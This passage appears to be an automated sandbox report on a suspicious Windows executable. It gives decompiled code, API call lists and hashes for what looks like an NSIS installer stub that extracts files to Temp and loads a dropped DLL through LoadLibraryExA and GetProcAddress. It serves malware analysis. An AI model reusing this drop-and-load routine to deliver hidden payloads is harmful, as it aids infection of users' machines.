                    					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                    						goto L22;
                    					}
                    				}
                    				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                    				__eflags = _t80 - _t75;
                    				if(_t80 >= _t75) {
                    					goto L31;
                    				} else {
                    					__eflags = _t80 - 0xfffffffe;
                    					if(_t80 != 0xfffffffe) {
                    						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
                    					} else {
                    						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
                    						lstrcatA(0x409b78,  *(_t85 - 8));
                    					}
                    					_push(0x200010);
                    					_push(0x409b78);
                    					E004051EC();
                    					goto L29;
                    				}
                    				goto L33;
                    			}

                    0x00401734
                    0x0040173b
                    0x00401744
                    0x00401747
                    0x0040174a
                    0x0040174f
                    0x00401757
                    0x00401773
                    0x00401759
                    0x00401759
                    0x0040175a
                    0x0040175a
                    0x00401779
                    0x00401783
                    0x00401783
                    0x00401787
                    0x0040178a
                    0x0040178f
                    0x00401791
                    0x00401793
                    0x00401798
                    0x00401798
                    0x004017a3
                    0x004017a3
                    0x004017b4
                    0x004017b6
                    0x004017b6
                    0x004017b7
                    0x004017b7
                    0x004017ba
                    0x004017bd
                    0x004017c0
                    0x004017c0
                    0x004017c7
                    0x004017d6
                    0x004017db
                    0x004017de
                    0x004017e1
                    0x00000000
                    0x00000000
                    0x004017e3
                    0x004017e6
                    0x00401840
                    0x00401845
                    0x004015a8
                    0x0040264e
                    0x0040264e
                    0x0040287d
                    0x00402880
                    0x00402880
                    0x00000000
                    0x004017e8
                    0x004017ee
                    0x004017f9
                    0x00401806
                    0x00401811
                    0x00401827
                    0x00401827
                    0x0040182a
                    0x00000000
                    0x00401830
                    0x00401830
                    0x00401831
                    0x0040184e
                    0x00402886
                    0x00402886
                    0x00402886
                    0x00401833
                    0x00401833
                    0x00401834
                    0x00401492
                    0x00402200
                    0x00402200
                    0x00402200
                    0x00401831
                    0x0040182a
                    0x00402888
                    0x0040288c
                    0x0040288c
                    0x0040185e
                    0x00401863
                    0x00401869
                    0x0040186a
                    0x0040186b
                    0x0040186e
                    0x00401871
                    0x00401876
                    0x0040187c
                    0x00401880
                    0x00401882
                    0x0040188a
                    0x00401896
                    0x00401884
                    0x00401884
                    0x00401888
                    0x00000000
                    0x00000000
                    0x00401888
                    0x0040189f
                    0x004018a5
                    0x004018a7
                    0x00000000
                    0x004018ad
                    0x004018ad
                    0x004018b0
                    0x004018c8
                    0x004018b2
                    0x004018b5
                    0x004018be
                    0x004018be
                    0x004018cd
                    0x004018d2
                    0x004021fb
                    0x00000000
                    0x004021fb
                    0x00000000

                    APIs
                    • lstrcatA.KERNEL32(00000000,00000000,qdrjldxxem,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                    • CompareFileTime.KERNEL32(-00000014,?,qdrjldxxem,qdrjldxxem,00000000,00000000,qdrjldxxem,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                      • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,foxdilaoqebdbpxrsdbw Setup,NSIS Error), ref: 00405938
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                      • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F887,74E5EA30), ref: 00404D25
                      • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp$C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll$qdrjldxxem
                    • API String ID: 1941528284-2859206688
                    • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                    • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                    • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                    • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                    				signed int _v8;
                    				long _v12;
                    				void* _v16;
                    				long _v20;
                    				long _v24;
                    				intOrPtr _v28;
                    				char _v92;
                    				void* _t67;
                    				void* _t68;
                    				long _t74;
                    				intOrPtr _t79;
                    				long _t80;
                    				void* _t82;
                    				int _t84;
                    				intOrPtr _t95;
                    				void* _t97;
                    				void* _t100;
                    				long _t101;
                    				signed int _t102;
                    				long _t103;
                    				int _t104;
                    				intOrPtr _t105;
                    				long _t106;
                    				void* _t107;
                    
                    				_t102 = _a16;
                    				_t97 = _a12;
                    				_v12 = _t102;
                    				if(_t97 == 0) {
                    					_v12 = 0x8000;
                    				}
                    				_v8 = _v8 & 0x00000000;
                    				_v16 = _t97;
                    				if(_t97 == 0) {
                    					_v16 = 0x418b80;
                    				}
                    				_t65 = _a4;
                    				if(_a4 >= 0) {
                    					_t95 =  *0x42ebb8; // 0x93a3
                    					E00403098(_t95 + _t65);
                    				}
                    				_t67 = E00403066( &_a16, 4); // executed
                    				if(_t67 == 0) {
                    					L34:
                    					_push(0xfffffffd);
                    					goto L35;
                    				} else {
                    					if((_a19 & 0x00000080) == 0) {
                    						if(_t97 == 0) {
                    							while(_a16 > 0) {
                    								_t103 = _v12;
                    								if(_a16 < _t103) {
                    									_t103 = _a16;
                    								}
                    								if(E00403066(0x414b80, _t103) == 0) {
                    									goto L34;
                    								} else {
                    									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                    										L29:
                    										_push(0xfffffffe);
                    										L35:
                    										_pop(_t68);
                    										return _t68;
                    									} else {
                    										_v8 = _v8 + _t103;
                    										_a16 = _a16 - _t103;
                    										continue;
                    									}
                    								}
                    							}
                    							L45:
                    							return _v8;
                    						}
                    						if(_a16 < _t102) {
                    							_t102 = _a16;
                    						}
                    						if(E00403066(_t97, _t102) != 0) {
                    							_v8 = _t102;
                    							goto L45;
                    						} else {
                    							goto L34;
                    						}
                    					}
                    					_t74 = GetTickCount();
                    					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
                    					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
                    					_t14 =  &_a16;
                    					 *_t14 = _a16 & 0x7fffffff;
                    					_v20 = _t74;
                    					 *0x40afc8 = 8;
                    					 *0x414b70 = 0x40cb68;
                    					 *0x414b6c = 0x40cb68;
                    					 *0x414b68 = 0x414b68;
                    					_a4 = _a16;
                    					if( *_t14 <= 0) {
                    						goto L45;
                    					} else {
                    						goto L9;
                    					}
                    					while(1) {
                    						L9:
                    						_t104 = 0x4000;
                    						if(_a16 < 0x4000) {
                    							_t104 = _a16;
                    						}
                    						if(E00403066(0x414b80, _t104) == 0) {
                    							goto L34;
                    						}
                    						_a16 = _a16 - _t104;
                    						 *0x40afb8 = 0x414b80;
                    						 *0x40afbc = _t104;
                    						while(1) {
                    							_t100 = _v16;
                    							 *0x40afc0 = _t100;
                    							 *0x40afc4 = _v12;
                    							_t79 = E00405D23("ktA");
                    							_v28 = _t79;
                    							if(_t79 < 0) {
                    								break;
                    							}
                    							_t105 =  *0x40afc0; // 0x41f887
                    							_t106 = _t105 - _t100;
                    							_t80 = GetTickCount();
                    							_t101 = _t80;
                    							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                    								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                    								_t107 = _t107 + 0xc;
                    								E00404CC9(0,  &_v92);
                    								_v20 = _t101;
                    							}
                    							if(_t106 == 0) {
                    								if(_a16 > 0) {
                    									goto L9;
                    								}
                    								goto L45;
                    							} else {
                    								if(_a12 != 0) {
                    									_t82 =  *0x40afc0; // 0x41f887
                    									_v8 = _v8 + _t106;
                    									_v12 = _v12 - _t106;
                    									_v16 = _t82;
                    									L24:
                    									if(_v28 != 1) {
                    										continue;
                    									}
                    									goto L45;
                    								}
                    								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                    								if(_t84 == 0 || _v24 != _t106) {
                    									goto L29;
                    								} else {
                    									_v8 = _v8 + _t106;
                    									goto L24;
                    								}
                    							}
                    						}
                    						_push(0xfffffffc);
                    						goto L35;
                    					}
                    					goto L34;
                    				}
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 00402EAB
                    • GetTickCount.KERNEL32 ref: 00402F52
                    • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                    • wsprintfA.USER32 ref: 00402F8B
                    • WriteFile.KERNELBASE(00000000,00000000,0041F887,7FFFFFFF,00000000), ref: 00402FB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CountTick$FileWritewsprintf
                    • String ID: ... %d%%$ktA
                    • API String ID: 4209647438-1009728241
                    • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                    • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                    • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                    • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E00401F51(void* __ebx, void* __eflags) {
                    				struct HINSTANCE__* _t18;
                    				struct HINSTANCE__* _t25;
                    				void* _t26;
                    				struct HINSTANCE__* _t29;
                    				CHAR* _t31;
                    				intOrPtr* _t32;
                    				void* _t33;
                    
                    				_t26 = __ebx;
                    				asm("sbb eax, 0x42ec18");
                    				 *(_t33 - 4) = 1;
                    				if(__eflags < 0) {
                    					_push(0xffffffe7);
                    					L14:
                    					E00401423();
                    					L15:
                    					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
                    					return 0;
                    				}
                    				_t31 = E004029E8(0xfffffff0);
                    				 *(_t33 + 8) = E004029E8(1);
                    				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                    					L3:
                    					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                    					_t29 = _t18;
                    					if(_t29 == _t26) {
                    						_push(0xfffffff6);
                    						goto L14;
                    					}
                    					L4:
                    					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                    					if(_t32 == _t26) {
                    						E00404CC9(0xfffffff7,  *(_t33 + 8));
                    					} else {
                    						 *(_t33 - 4) = _t26;
                    						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                    							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
                    						} else {
                    							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                    							if( *_t32() != 0) {
                    								 *(_t33 - 4) = 1;
                    							}
                    						}
                    					}
                    					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                    						FreeLibrary(_t29);
                    					}
                    					goto L15;
                    				}
                    				_t25 = GetModuleHandleA(_t31); // executed
                    				_t29 = _t25;
                    				if(_t29 != __ebx) {
                    					goto L4;
                    				}
                    				goto L3;
                    			}

                    APIs
                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                      • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F887,74E5EA30), ref: 00404D25
                      • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                    • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                    • String ID: B
                    • API String ID: 2987980305-3806887055
                    • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                    • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                    • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                    • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                    				struct _SECURITY_ATTRIBUTES** _t10;
                    				int _t19;
                    				struct _SECURITY_ATTRIBUTES* _t20;
                    				signed char _t22;
                    				struct _SECURITY_ATTRIBUTES* _t23;
                    				CHAR* _t25;
                    				struct _SECURITY_ATTRIBUTES** _t29;
                    				void* _t30;
                    
                    				_t23 = __ebx;
                    				_t25 = E004029E8(0xfffffff0);
                    				_t10 = E004054B2(_t25);
                    				_t27 = _t10;
                    				if(_t10 != __ebx) {
                    					do {
                    						_t29 = E00405449(_t27, 0x5c);
                    						 *_t29 = _t23;
                    						 *((char*)(_t30 + 0xb)) =  *_t29;
                    						_t19 = CreateDirectoryA(_t25, _t23); // executed
                    						if(_t19 == 0) {
                    							if(GetLastError() != 0xb7) {
                    								L4:
                    								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                    							} else {
                    								_t22 = GetFileAttributesA(_t25); // executed
                    								if((_t22 & 0x00000010) == 0) {
                    									goto L4;
                    								}
                    							}
                    						}
                    						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                    						 *_t29 = _t20;
                    						_t27 =  &(_t29[0]);
                    					} while (_t20 != _t23);
                    				}
                    				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                    					_push(0xfffffff5);
                    					E00401423();
                    				} else {
                    					E00401423(0xffffffe6);
                    					E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                    					SetCurrentDirectoryA(_t25); // executed
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                    				return 0;
                    			}

                    APIs
                      • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004054C0
                      • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                      • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                    • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 3751793516-501415292
                    • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                    • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                    • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                    • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
                    				signed int _t11;
                    				int _t14;
                    				signed int _t16;
                    				void* _t19;
                    				CHAR* _t20;
                    
                    				_t20 = _a4;
                    				_t19 = 0x64;
                    				while(1) {
                    					_t19 = _t19 - 1;
                    					_a4 = 0x61736e;
                    					_t11 = GetTickCount();
                    					_t16 = 0x1a;
                    					_a6 = _a6 + _t11 % _t16;
                    					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                    					if(_t14 != 0) {
                    						break;
                    					}
                    					if(_t19 != 0) {
                    						continue;
                    					}
                    					 *_t20 =  *_t20 & 0x00000000;
                    					return _t14;
                    				}
                    				return _t20;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 00405644
                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-999216652
                    • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                    • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E004030AF(void* __eflags) {
                    				void* _t2;
                    				void* _t5;
                    				CHAR* _t6;
                    
                    				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                    				E00405B89(_t6);
                    				_t2 = E0040548B(_t6);
                    				if(_t2 != 0) {
                    					E0040541E(_t6);
                    					CreateDirectoryA(_t6, 0); // executed
                    					_t5 = E00405631("1033", _t6); // executed
                    					return _t5;
                    				} else {
                    					return _t2;
                    				}
                    			}

                    APIs
                      • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                      • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                      • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                      • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                    • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Char$Next$CreateDirectoryPrev
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 4115351271-1075807775
                    • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                    • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                    • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                    • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
                    				intOrPtr* _t6;
                    				void* _t8;
                    				void* _t10;
                    				signed int _t11;
                    				void* _t12;
                    				intOrPtr _t15;
                    				signed int _t16;
                    				signed int _t17;
                    				void* _t18;
                    
                    				_t17 = _a4;
                    				while(_t17 >= 0) {
                    					_t15 =  *0x42eb90; // 0x6c084c
                    					_t6 = _t17 * 0x1c + _t15;
                    					if( *_t6 == 1) {
                    						break;
                    					}
                    					_push(_t6); // executed
                    					_t8 = E00401434(); // executed
                    					if(_t8 == 0x7fffffff) {
                    						return 0x7fffffff;
                    					}
                    					_t10 = E0040136D(_t8);
                    					if(_t10 != 0) {
                    						_t11 = _t10 - 1;
                    						_t16 = _t17;
                    						_t17 = _t11;
                    						_t12 = _t11 - _t16;
                    					} else {
                    						_t12 = _t10 + 1;
                    						_t17 = _t17 + 1;
                    					}
                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                    						 *0x42e34c =  *0x42e34c + _t12;
                    						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
                    					}
                    				}
                    				return 0;
                    			}


                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                    • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                    • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                    • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E00405602(CHAR* _a4, long _a8, long _a12) {
                    				signed int _t5;
                    				void* _t6;
                    
                    				_t5 = GetFileAttributesA(_a4); // executed
                    				asm("sbb ecx, ecx");
                    				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                    				return _t6;
                    			}


                    APIs
                    • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\U001P56ybm.exe,80000000,00000003), ref: 00405606
                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                    • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                    • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                    • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004055E3(CHAR* _a4) {
                    				signed char _t3;
                    
                    				_t3 = GetFileAttributesA(_a4); // executed
                    				if(_t3 != 0xffffffff) {
                    					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                    				}
                    				return _t3;
                    			}


